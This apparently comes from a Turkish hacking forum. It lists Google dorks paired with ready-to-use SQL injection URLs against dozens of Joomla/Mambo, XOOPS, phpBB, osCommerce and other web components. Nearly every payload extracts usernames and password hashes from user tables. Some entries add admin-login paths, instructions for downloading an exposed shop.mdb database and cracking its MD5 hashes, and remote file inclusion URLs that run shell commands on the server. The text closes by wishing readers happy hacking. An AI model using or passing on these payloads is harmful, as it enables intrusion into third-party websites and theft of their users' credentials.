DORK 2 : allinurl:"com_na_bible"
DORK 3 : allinurl:"com_na_events"
DORK 4 : allinurl:"com_na_content"
DORK 5 : allinurl:"com_na_feedback"
DORK 6 : allinurl:"com_na_mydocs"
DORK 7 : allinurl:"com_na_churchmap"
DORK 8 : allinurl:"com_na_bibleinfo"
DORK 9 : allinurl:"com_na_dbs"
DORK 10 : allinurl:"com_na_udm"
DORK 11 : allinurl:"com_na_qforms"
DORK 12 : allinurl:"com_na_gallery2"
DORK 13 : allinurl:"com_na_publicrss"
DORK 14 : allinurl:"index.php?kwd"
EXPLOİT:
index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*
Com-Comments Açığı
Dork: "Review ******", "Phil Taylor"
Exploit:
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1
Portfolio Manager 1.0 Açığı
Dork: inurl:"index.php?option=com_portfolio"
Exploit:
http://site.com/index.php?option=com_portfolio&memberId=9&category Id=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*
Com-Astatspro Açığı
Dork: allinurl: "com_astatspro"
PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
Gelen sayfada sağ tıkla kaynağı görüntüle.
<H1>302 Moved</H1>
The document has moved <A HREF="admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator">here</A>.
Bu bölümde md5 saklıdır.
Modified By Fully Açığı
DORK : allinurl :kb.php?mode=article&k
DORK : "Powered by phpBB © 2001, 2006 phpBB Group" veya "Modified by Fully Modded phpBB © 2002, 2006"
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),usernam e,char(58),user_password),4,5,6,7,8,9,10,11,12,13+ from+phpbb_users+where+user_id+=2&page_num=2&cat=1
Easy-Clanpage v2.2 Açığı
Dork: "Easy-Clanpage v2.2"
Example -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
BM Classifieds Açığı
Dork 1 : ''showad.php?listingid=''
Dork 2 : ''pfriendly.php?ad=''
EXPLOIT:
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
Porar WebBoart Açığı
DorK : '' webboard question.asp QID''
EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20';';
Com-Noticias Açığı
DorK : ''com_noticias''
EXPLOIT: index.php?option=com_noticias&Itemid=xcorpitx&task =detalhe&id=-99887766/**/union/**/%20select/**/0,concat##(username,0x3a,password,0x3a,email),2,3, 4,5/**/%20from/**/%20jos_users/*
ASPapp -links.asp Açığı
dork - ''links.asp?CatId''
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,nul l,user_name,%205%20,password,null%20FROM%20Users
admin login-
www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3 F
Modules-Viso Açığı
DORKS 1 : allinurl :"modules/viso"
EXPLOIT 1 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
EXPLOIT 2 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass,pass/**/from/**/exv2_users/*where%20exv2_admin%201
Bookmarkx ****** Açığı
DorK 1 : "2007 BookmarkX ******"
DORK 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :"index.php?menu=showtopic"
EXPLOIT :
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
veya;
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
Com-Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Com-Jpad Açığı
DORK: allinurl:com_jpad
Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users--
PostSchedule Açığı
Google Dork : "PostSchedule ver 1"
Exploid:
index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
joomla SQL Injection(Com-Jokes) Açığı
DorK : allinurl: "com_jokes"
EXPLOIT :
index.php?option=com_jokes&Itemid=bgh7&func=CatVie w&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*
Com_Estateagent Açığı
Dork : allinurl: "com_estateagent"
EXPLOIT :
index.php?option=com_estateagent&Itemid=bgh7&func= showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=xxxx
Com-Fq Açığı
DorK: allinurl: "com_fq"
EXPLOIT :
index.php?option=com_fq&Itemid=S@BUN&listid=999999 9/**/union/**/select/**/name,password/**/from/**/mos_users/*
Com-Mamml Açığı
DorK : allinurl: "com_mamml"
EXPLOIT :
index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
joomla SQL Injection(com_gallery) Açığı
DORK : allinurl: com_gallery "func"
EXPLOIT 1 :
index.php?option=com_gallery&Itemid=0&func=detail& id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,use rname/**/from/**/mos_users/*
EXPLOİT 2 :
index.php?option=com_gallery&Itemid=0&func=detail& id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C 0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmo s_users
Joomla Component Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Joomla Component Filiale SQL Injection Açığı
DORK : inurl:com_filiale
Exploit : /index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users
FlippingBook Açığı
DORK : inurl:com_flippingbook
Exploit :
/index.php?option=com_flippingbook&Itemid=28&book_i d=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
Pagenum Açığı
DORK : allinurl: " list.php?pagenum"
EXPLOIT
list.php?pagenum=0&categoryid=1+union+select+111,2 22,concat_ws(char(58),login,password),444+from+adm in_login/*
Modules-Tutorials Açığı
DORK 1 : allinurl :"/modules/tutorials/"
DORK 2 : allinurl :"/modules/tutorials/"tid
EXPLOIT 1 :
modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass), 3,4,5/**/from/**/xoops_users/*
EXPLOIT 2 :
modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*
Modules-Glossaires Açığı
DORK : allinurl: "modules/glossaires"
EXPLOIT :
modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme
OsCommerce SQL Injection Açığı
Google Dork: inurl:"customer_testimonials.php"
Exploit:
http://site.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
Not: Aynı zamanda yönetici değilde bütün üyelerin md5 lerini karşınıza dizer.
Tr ****** News v2.1 Açığı
Google Dork: inurl:news.php?mode=voir
Exploid: news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
Admin girişi = /admin
Com-Alberghi Açığı
DORK 1 : allinurl: "" detail
DORK 2 : allinurl: "com_alberghi"
EXPLOIT 1 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,con cat(username,0x3a,password)/**/from/**/jos_users/*
EXPLOIT 2 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3 ,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*
Powered By Joovideo V1.0 Açığı
DORK 1 : allinurl: "com_joovideo" detail
DORK 2 : allinurl: "com_joovideo"
DORK 3 : Powered by joovideo V1.0
EXPLOIT :
index.php?option=com_joovideo&Itemid=S@BUN&task=de tail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2 ,2,concat(username,0x3a,password)/**/from/**/jos_users/*
AllMy-Guests ****** Açığı
Açığı bulunan ******: AllMyGuests
Google Dork: "powered by AllMyGuests" (Tırnaklar yok)
Example (Exploid): http://site.de/allmyguest/index.php?AMG_open=comments&AMG_id=null+UNION+SELE CT+1,2,3,concat_ws(0x203a20,user_name,user_passwor d,user_email),5,6,7+from+allmyphp_user+where+user_ id=1--
123FlashChat Açığı
DORKS : "123flashchat.php"
EXPLOITS :
Http://localhost/path/123flashchat.php?e107path=Shell
AlphaContent 2.5.8 © Açığı
DORK 1 : inurl: "com_alphacontent"
DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"
Exploit :
index.php?option=com_alphacontent§ion=6&cat=15 &task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user() ,user(),user(),user(),user(),user(),user(),user(), user(),user(),user(),user(),user(),user(),user(),u ser(),user(),user(),user(),user(),user(),user(),us er(),user(),user(),user(),user(),user(),user(),use r(),user(),user(),user(),39/**/from/**/jos_users/*
Mambo Component (com-downloads) Açığı
DORK : allinurl :"com_downloads"filecatid
EXPLOIT :
index.php?option=com_downloads&Itemid=S@BUN&func=s electfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3 a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
MiniNuke 2.1 Açığı
DORK 1 : allinurl:"members.asp?action"
DORK 2 : allinurl: "members.asp"uid
EXPLOIT 1 :
members.asp?action=member_details&uid=-1%20union%20select%200,sifre,0,0,0,0,0,kul_adi,0,s ifre,kul_adi,sifre,1,1,1,sifre,1,1,1,isim,1,1,1,1, 1,1,1,1%20from%20members
EXPLOIT 2 :
members.asp?action=member_details&uid=-1%20union%20select%200,0,0,0,0,0,0,sifre,0,sifre,0 ,1,1,sifre,14,sifre,1,1,1,1,2,1,2,2,2,2,2,2,2,2%20 from%20members
EXPLLOIT 3 :
members.asp?action=member_details&uid=-1%20union%20select%200,1,sifre,0,0,0,0,0,0,0,1,1,1 ,1,1,1,1,1,1,1,2,2,kul_adi,sifre,2,kul_adi,sifre,2 ,2,2,sifre,3,3,3,isim,3,3,3,3,3,4,4,4%20from%20mem bers
Modules-Wepchat Açığı
DORK : allinurl :"modules/WebChat"
EXPLOIT :
modules/WebChat/index.php?roomid=-9999999/**/union/**/select/**/0,uname,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
Modules-Repice Açığı
DORK : allinurl :"modules/recipe"
EXPLOIT :
modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2
Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
eXV2 MyAnnonces Açığı
DORK : eXV2 MyAnnonces
EXPLOIT :
modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-9999999/**/union/**/select/**/pass,pass,uname,0x3a,0x3a,0x3a,0x3a,0,0,0,0x3a,0x3 a,1/**/from/**/exv2_users/*where%20exv2_admin%201
Modules-Dictionary Açığı
DORK 1 : allinurl: "modules/dictionary"
DORK 2 : allinurl: "modules/dictionary/print.php?id"
EXPLOIT :
modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
Geçerli versiyonlar;
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
Com-Restaurante Açığı
DORK : allinurl: "com_restaurante"
EXPLOIT :
index.php?option=com_restaurante&task=detail&Itemi d=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,conca t(username,0x3a,password)/**/from/**/jos_users/*
Com-Accombo Açığı
DORK : allinurl: "com_accombo"
EXPLOIT :
index.php?option=com_accombo&func=detail&Itemid=S@ BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x 3a,password)/**/from/**/mos_users/*
Powered By Runcms Açığı
DORK 1 : allinurl: "modules/photo/viewcat.php?id"
DORK 2 : inurlhoto "powered by runcms"
EXPLOIT :
admin/exploit
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*
pass/exploit
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
Not: Admin/exploit'i site sonuna yapıştırırsak admin nick verir.
Pass/exploit'i yapıştırırsak md5 leri verir.
Admin girişi:
http://www.bbb.net/admin
Powered By Download 3000 Açığı
DORK 1 : "Powered by Download 3000"
DORK 2 : allinurl: "com_d3000"
EXPLOiT :
index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*
Powered By Smoothflash Açığı
DORK 1 : "Powered by Smoothflash"
DORK 2 : allinurl: "admin_view_image.php"
EXPLOiT :
admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users
Com-Ahsshop Açığı
DORK : allinurl: "com_ahsshop"do=default
EXPLOiT 1 :
index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0 x3a/**/from/**/mos_users/*
EXPLOiT 2 :
index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*
Mod-Archives Açığı
DORK : allinurl: "index.php?mod=archives"
EXPLOiT :
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10,11,12,13/**/from/**/users/*
EXPLOiT 2:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10/**/from/**/users/*
EXPLOiT 3:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10,11,12,13,14/**/from/**/users/*
Galery-Action Açığı
DORK : allinurl: "index.php?mod=galerie"action=gal
EXPLOiT :
index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pa ss),4,5,6,7/**/from/**/users/*
Powered By Site Sift Açığı
DORK 1 : powered by Site Sift
DORK 2 : allinurl: "index php go addpage"
DORK 3 : allinurl: "index.php?go=detail id="
EXPLOiT 1:
index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16/**/from/**/admin/*
EXPLOİT 2:
index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*
Galery-İmg Açığı
DORK : allinurl: "index.php?p=gallerypic img_id"
EXPLOiT 1:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6 ,7,8+from+koobi4_user
EXPLOiT 2:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6 ,7,8+from+koobi_user
Galid-Galeri Açığı
DORK : allinurl: galid "index.php?p=gallerypic"
EXPLOiT :
index.php?p=gallerypic&img_id=S@BUN&galid=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Area-Galid Açığı
DORK : allinurl: "index.php?area"galid
EXPLOiT :
index.php?area=1&p=gallery&action=showimages&galid =-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Shop-Categ Açığı
DORK : allinurl: "index php p shop"categ
EXPLOiT :
index.php?p=shop&show=showdetail&fid=S@BUN&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Showlink Açığı
DORK : allinurl: "index.php?showlink"links
EXPLOiT :
index.php?showlink=BGH7&fid=BGH78&p=links&area=1&c ateg=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
admin login=admin/login.php
RS MAXSOFT Açığı
DORK 1 : "RS MAXSOFT"
DORK 2 : "Provozováno na RS MAXSOFT"
EXPLOiT:
modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
PollBooth Açığı
DORK : allinurl: "pollBooth.php?op=results"pollID
EXPLOiT :
pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users
Showresult Açığı
DORK 1 : allinurl: "index.php?p=poll"showresult
DORK 2 : allinurl: poll_id "showresult"
EXPLOiT :
index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+ kpro_user
Fpdb/shop.mdb Açığı
google.com 'da aratacağız;
inurl:"mall/lobby.asp
Sonra çıkan sitenin sonuna ''fpdb/shop.mdb'' ekleyin "tırnaksız".
örnek: http://www.gemdepot.com/mall/lobby.asp
http://www.gemdepot.com/fpdb/shop.mdb
mdb diye dosya çıktı farklı kaydet diyoruz ve açıyoruz...
mdb gizlenmiş şifreyi alıp md5 kırıcı sitede kırıyoruz ve siteye giriş yapıp hackliyoruz...
Xopps Açığı
Dork: inurl:/modules/wfsection/
Exploide:
print.php?articleid=9999999 union select 1111,2222,3333,4444,concat(char(117,115,101,114,11 0,97,109,101,58),u*****char(112,97,115,115,119,111 ,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0 from xoops_users where uid like 1/*
Com_shambo2 Açığı
Dork(Googlede Aratacağımız Kod): "inurl:com_shambo2" (Tırnaklar yok.)
Exploid(Site Sonuna Ekleyeceğimiz Kod);
index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0% 2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F %2A%2A%2Ffrom%2F%2A%2A%2Fmos_users
PHP-Calendar Açığı
Arama : google.com => intitle:"EasyPHPCalendar
Site sonuna(Herhangi biri);
/calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/datePicker.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
Ben'den Bu Kadar İyi Hack'lemeler !
